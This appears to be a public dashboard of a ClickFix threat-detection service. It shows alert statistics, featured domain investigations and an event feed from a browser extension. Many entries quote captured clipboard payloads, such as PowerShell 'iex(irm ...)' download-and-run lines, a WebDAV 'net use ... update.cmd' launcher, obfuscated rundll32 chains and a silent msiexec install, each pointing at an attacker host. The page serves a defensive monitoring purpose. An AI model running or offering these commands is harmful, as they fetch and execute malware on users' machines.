ClickFix Centre de Comandament

Deteccio, explicabilitat i resposta en una sola superficie de control.

Fusión entre la versión anterior y la actual: inteligencia pública, operaciones privadas, investigación en grafo, listas de control y mensajería con la extensión.

Vista pública
Búsqueda forense

Filtra por dominio, comando, fecha y score para detectar patrones.

Operacions

Actualiza revisión, bloquea dominios y manda casos a investigación.

Investigación

Construye grafos con nodos, relaciones, notas y evidencias compartibles.

Cobertura

Revisa fuentes de inteligencia, listas y configuracion de scoring.

Inicio rápido

Vista pública activa. Puedes consultar cobertura y buscar eventos; inicia Sesión para ejecutar acciones operativas.

  1. Revisa KPIs y alertas recientes.
  2. Filtra dominios/comandos sospechosos.
  3. Ejecuta bloqueo o abre investigación.

alertes totals

2293

bloquejos totals

1486

dominios únicos

1134

regiones monitorizadas

13

alertes 24h

1

bloquejos 24h

0

ratio bloqueig 24h

0.00%

alt risc 24h

0

nous dominis 24h

1

pend. fuera listas

119

revisades

308

cobertura revisión

13.43%

llocs manuals

0

pend. revisión

1985

Último escaneo

Vista previa: Después llega desde la extensión al detectar alerta y Abans se genera en servidor (Site-Shot) tras recibir ese after.

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Abans

before scan

Despres

after scan

Investigaciones destacadas en Inicio

Las define admin desde Investigación. En la portada pública solo salen si también están compartidas en Público.

Investigacion alerta #1858 - socheaphost.com

graph #17 | dominio: socheaphost.com | verdict: malicious | report_id: 1858 | posición: 0

Investigacion generada desde alerta #1858.
Dominio: socheaphost.com
Fecha alerta: 2026-03-27T14:11:15+00:00
Score: 83/100
URL: https://socheaphost.com/IRS_SUPPORT/RemotePCHost_EgS2oOxh0WtodC9.exe
Mensaje: Detected snippet: "Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Blocked extension: .exe" Detected snippet: "Unfamiliar download host: socheaphost.com" Detected snippet: "Host matched blocklist." Detected snippet: "Runtime verdict: unsafe (83/100)" Detected snippet: "Models URL:0 Content:18 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Unsafe download blocked: RemotePCHost_EgS2oOxh0WtodC9 (1).exe" Detected snippet: "Runtime reason: Blocked extension: .exe" Detected snippet: "Runtime reason: Unfamiliar download host: socheaphost.com" Detected snippet: "Runtime reason: Host matched blocklist." Confidence score: 83/100
Detectad
Abrir investigación Aun no es pública.

Abans

Sin captura aprobada antes.

Despres

Sin captura aprobada despues.

Investigacion alerta #1526 - iamdavidachom.com

graph #14 | dominio: iamdavidachom.com | verdict: investigating | report_id: 1526 | posición: 0

Investigacion generada desde alerta #1526.
Dominio: iamdavidachom.com
Fecha alerta: 2026-03-08T20:42:18+00:00
Score: 70/100
URL: https://iamdavidachom.com/?cfcw_captcha_page=1
Mensaje: Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "cmd /c net use Z: http://185.246.223.71/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete" Detected snippet: "Runtime verdict: unsafe (70/100)" Detected snippet: "Models URL:0 Content:35 Reputation:35 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Detected snippet: "Runtime reason: Host appears in active blocklist." Clipboard blocked: "cmd /c net use Z: h

Abans

Sin captura aprobada antes.

Despres

Sin captura aprobada despues.

Investigacion alerta #1088 - guard-google.com

graph #6 | dominio: guard-google.com | verdict: investigating | report_id: 1088 | posición: 0

Investigacion generada desde alerta #1088.
Dominio: guard-google.com
Fecha alerta: 2026-03-08T16:32:18+00:00
Score: 0/100
URL: https://guard-google.com/
Mensaje: Manual user report

Abans

Sin captura aprobada antes.

Despres

Sin captura aprobada despues.

socheaphos.com

graph #8 | dominio: socheaphos.com | verdict: malicious | report_id: - | posición: 0

Sin resumen todavía.
Abrir investigación Aun no es pública.

Abans

Sin captura aprobada antes.

Despres

Sin captura aprobada despues.

Investigacion alerta #1405 - winnipeglandscapingpros.com

graph #7 | dominio: winnipeglandscapingpros.com | verdict: investigating | report_id: 1405 | posición: 0

Investigacion generada desde alerta #1405.
Dominio: winnipeglandscapingpros.com
Fecha alerta: 2026-03-08T18:43:42+00:00
Score: 0/100
URL: https://winnipeglandscapingpros.com/
Mensaje: Manual user report
Abrir investigación Aun no es pública.

Abans

Sin captura aprobada antes.

Despres

Sin captura aprobada despues.

Events

Triage workspace with event feed, detail panel, and quick actions.

24h alerts 1 24h blocks 0 pending 1985
Selecciona un evento para ver el detalle enriquecido.
Eventos por dominio (agrupados)
DominioEventosImpactos (dup)BloqueosScore maxÚltima actividad
cdn.southeastwater.co.uk 1 1 0 16/100 2026-07-27T16:49:16+00:00
fmi.univ-bba.dz 4 4 0 60/100 2026-07-26T15:41:39+00:00
articulateusercontent.com 2 2 0 16/100 2026-07-15T16:06:31+00:00
andrescuartero.cat 3 295 3 0/100 2026-07-14T07:07:42+00:00
www.ceipalandalus.net 4 4 0 53/100 2026-07-13T07:50:28+00:00
www.iesbeatrizdesuabia.es 2 2 0 53/100 2026-07-13T07:10:24+00:00
panel.findatreasure.uk 1 1 0 20/100 2026-07-12T12:50:28+00:00
www.aprenalvalles.cat 2 2 0 40/100 2026-07-10T12:05:03+00:00
interstate.myinvestment.properties 1 1 0 45/100 2026-07-10T12:05:03+00:00
Captures web (before/after)

Último escaneo

scan_id: 1554 | mail.fundacion-primavera.org | 2026-03-09T13:23:28+00:00

Abans

approved
before scan

Después

approved
after scan
Vista tabular classica
FechaDominioMarcadoMensajeEstado
2026-07-27T16:49:16+00:00 cdn.southeastwater.co.uk - Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Sussex_and_West_Public_Notice_2026.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: cdn.southeastwater.co.uk" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions google but host is cdn.southeastwater.co.uk." Confidence score: 16/100 pending
2026-07-26T15:41:39+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/ec9bc3510ca9933c' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/ec9bc3510ca9933c' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/b02446900a43ae23' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/b02446900a43ae23' -UseBasicParsing)"; exit " Confidence score: 60/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/98b7ea7f07e2822f' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/98b7ea7f07e2822f' -UseBasicParsing)"; exit " Confidence score: 58/100 pending
2026-07-26T15:36:55+00:00 fmi.univ-bba.dz - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'authorization-code-cdn.info/506b04d930d7b7ae' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'authorization-code-cdn.info/506b04d930d7b7ae' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-15T16:06:31+00:00 articulateusercontent.com - Se detectó contenido de comandos ofuscado o codificado. Fragmento detectado: "Non-HTML content probe (application/pdf)" Fragmento detectado: "Filename: nESSczrR2hBnpZk2.pdf" Fragmento detectado: "Extension: .pdf" Fragmento detectado: "Unfamiliar download host: articulateusercontent.com" Fragmento detectado: "Runtime verdict: low (0/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Puntuación de confianza: 16/100 pending
2026-07-15T15:36:31+00:00 articulateusercontent.com - Se detectó contenido de comandos ofuscado o codificado. Fragmento detectado: "Non-HTML content probe (application/pdf)" Fragmento detectado: "Filename: zV4zkZp5-NlNMaeH.pdf" Fragmento detectado: "Extension: .pdf" Fragmento detectado: "Unfamiliar download host: articulateusercontent.com" Fragmento detectado: "Runtime verdict: low (0/100)" Fragmento detectado: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:0" Puntuación de confianza: 16/100 pending
2026-07-13T06:12:47+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-14T06:22:41+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-14T06:17:41+00:00 andrescuartero.cat REINCIDENTE DOM x3 Reporte manual del usuario pending
2026-07-13T07:50:28+00:00 www.ceipalandalus.net - Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: Aula-mediodia-con-enlaces.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: www.ceipalandalus.net" Detected snippet: "Runtime verdict: low (10/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:10 Vision:0" Detected snippet: "Runtime reason: Brand mismatch: mentions meta but host is www.ceipalandalus.net." Confidence score: 10/100 pending
2026-07-13T07:35:26+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'blakcinwhitexn.cc/ae6e199d088a658b' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'blakcinwhitexn.cc/ae6e199d088a658b' -UseBasicParsing)"; exit " Confidence score: 53/100 pending
2026-07-13T07:10:24+00:00 www.iesbeatrizdesuabia.es - The page asks you to paste commands in CMD/PowerShell/Run. Obfuscated or encoded command content detected. Detected snippet: "Non-HTML content probe (application/pdf)" Detected snippet: "Filename: TRATAMIENTO-DE-LA-LECTURA-2024-25.pdf" Detected snippet: "Extension: .pdf" Detected snippet: "Unfamiliar download host: www.iesbeatrizdesuabia.es" Detected snippet: "Runtime verdict: low (16/100)" Detected snippet: "Models URL:0 Content:16 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Obfuscation/evasion pattern found." Confidence score: 26/100 pending
2026-07-12T12:50:28+00:00 panel.findatreasure.uk - Detected snippet: "Non-HTML content probe (text/html)" Detected snippet: "Filename: 8-es2015.e233d3d36ab69dad11a2.js" Detected snippet: "Extension: .js" Detected snippet: "Blocked extension: .js" Detected snippet: "Unfamiliar download host: panel.findatreasure.uk" Detected snippet: "Runtime verdict: low (20/100)" Detected snippet: "Models URL:0 Content:0 Reputation:0 Brand:0 Vision:20" Detected snippet: "Runtime reason: Download risk engine classified artifact as unsafe." Confidence score: 20/100 pending
2026-07-10T12:05:03+00:00 www.aprenalvalles.cat - Comando sospechoso detectado en el portapapeles. Patrón de comando sospechoso detectado. Fragmento detectado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\lwwu.1pishbini.com@SSL\4f894ac1-8d0b-4..." Fragmento detectado: "Runtime verdict: low (19/100)" Fragmento detectado: "Models URL:0 Content:19 Reputation:0 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Command execution pattern found." Fragmento detectado: "Runtime reason: Clipboard manipulation indicator found." Portapapeles bloqueado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\lwwu.1pishbini.com@SSL\4f894ac1-8d0b-4..." Puntuación de confianza: 40/100 pending
2026-07-10T12:05:03+00:00 www.aprenalvalles.cat - Comando sospechoso detectado en el portapapeles. Patrón de comando sospechoso detectado. Fragmento detectado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\nnny.1pishbini.com@SSL\90e13b17-94b8-4..." Fragmento detectado: "Runtime verdict: low (19/100)" Fragmento detectado: "Models URL:0 Content:19 Reputation:0 Brand:0 Vision:0" Fragmento detectado: "Runtime reason: Command execution pattern found." Fragmento detectado: "Runtime reason: Clipboard manipulation indicator found." Portapapeles bloqueado: "pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\nnny.1pishbini.com@SSL\90e13b17-94b8-4..." Puntuación de confianza: 37/100 pending
2026-07-10T12:05:03+00:00 interstate.myinvestment.properties REINCIDENTE DOM x1 • Comando sospechoso detectado en el portapapeles. • Patrón de comando sospechoso detectado. • Fragmento detectado: "msiexec /i http://inkbookwriters.com/verify /qn" • Portapapeles bloqueado: "msiexec /i http://inkbookwriters.com/verify /qn" • Puntuación de confianza: 45/100 pending
2026-07-08T10:15:03+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/241289ab0aac232f' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/241289ab0aac232f' -UseBasicParsing)"; exit " Confidence score: 49/100 pending
2026-07-08T10:10:03+00:00 www.ceipalandalus.net - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/2b9a64efd6e6e681' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'hilacbatoriaaa.cc/2b9a64efd6e6e681' -UseBasicParsing)"; exit " Confidence score: 49/100 pending
2026-07-07T07:41:44+00:00 www.iesbeatrizdesuabia.es - Suspicious command detected in the clipboard. Suspicious command pattern detected. The page asks you to paste commands in CMD/PowerShell/Run. Detected snippet: "powershell -w h "iex(irm 'pluhabovra.info/586f7f8cf59867b8' -UseBasicParsing)"; exit " Detected snippet: "Runtime verdict: low (31/100)" Detected snippet: "Models URL:0 Content:31 Reputation:0 Brand:0 Vision:0" Detected snippet: "Runtime reason: Command execution pattern found." Detected snippet: "Runtime reason: Shell execution hint found." Detected snippet: "Runtime reason: Clipboard manipulation indicator found." Clipboard blocked: "powershell -w h "iex(irm 'pluhabovra.info/586f7f8cf59867b8' -UseBasicParsing)"; exit " Confidence score: 53/100 pending